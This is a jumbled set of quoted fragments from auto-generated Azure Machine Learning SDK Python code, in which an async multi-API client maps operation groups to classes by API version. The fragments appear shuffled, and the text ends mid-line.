ValueError(\"API version {} does not have operation group 'code_versions'\".format(api_version)) return", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'events'\".format(api_version))", "from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "else: raise ValueError(\"API version {} does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client,", "def environment_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview:", "api_version = self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass", "* 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions')", "'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the", "depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if", "@property def models(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\"", "ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API version: *", "ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "* 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version ==", ":class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version", "if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API", "have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance", "from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version ==", "{} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "def migration(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version", "API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0:", "ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version)) return", "group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on", ":class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version ==", "ValueError(\"API version {} does not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", ":class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version", ":class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API", "..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations", "..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version {} does not have", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview:", "operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends", "regenerated. # -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview':", "2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview':", "if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version ==", "'2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does", "from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does not", "2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview':", "Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>`", "not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self):", "{} does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric':", "ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "== '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "== '1.0.0': from ..model_dataplane import models return models elif api_version == 'v1.0': from", "2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01':", "* 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features')", "self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API", ":param subscription_id: The ID of the target subscription. :type subscription_id: str :param api_version:", "= self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else:", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01': from", "its API version. The api-version parameter sets the default API version if the", "* 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\"", "on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>`", "config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k:", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview:", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif", "'2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass", "str :param profile: A profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles", "on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif", "TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "sets the default API version if the operation group is not described in", "a particular api-version and/or profile. The profile sets a mapping between an operation", "@property def data_containers(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` *", "@property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\"", "of the Azure clouds (Azure Stack, Azure Government, Azure China, etc.). By default,", "raise ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config,", "not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self):", "'2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'assets'\".format(api_version)) return", "= self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else:", "group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on", "cause incorrect behavior and will be lost if the code is # regenerated.", "version {} does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "\"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as", "api_version == '2021-10-01': from ..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview':", "..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations", "..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version {} does not have", "data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>`", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "== '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {}", "..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations", "group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on", "return models elif api_version == 'v1.0': from ..runhistory import models return models elif", "depends on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview:", "from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client,", "'1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0',", "{} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "from ..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import", "* 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version ==", "else: raise ValueError(\"API version {} does not have operation group 'events'\".format(api_version)) return OperationClass(self._client,", "ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview':", "import UsagesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "* 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\"", "reserved. # Licensed under the MIT License. See License.txt in the project root", "* 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version ==", "2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import", "group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on", "from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the", "class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake class to support", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise", "depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01:", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version", "Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>`", "WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass", "Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>`", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the API", "operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends", "implemetation of MultiApiClientMixin.\" Will be removed in final version of multiapi azure-core based", "..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API version: * 1.5.0:", "raise ValueError(\"API version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config,", "on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version", "\"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API version: *", "API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01':", "* 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version ==", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else:", "* 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores')", "API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0':", ":class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations", "version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>`", "Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>`", "ValueError(\"API version {} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API version: *", "def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async def", "# pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object):", ":class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from", "else: raise ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client,", "from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {} does not", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API", "* v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version", ":param profile: A profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword", "\"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as", "..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version {} does not", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version))", "support current implemetation of MultiApiClientMixin.\" Will be removed in final version of multiapi", "version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0': from", "ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass", "api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version == '2021-10-01':", "operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API version: * v1.0:", "== '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version ==", "import models return models elif api_version == 'v1.0': from ..registry_discovery import models return", "operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from", "v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import", "ValueError(\"API version {} does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", ":class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = 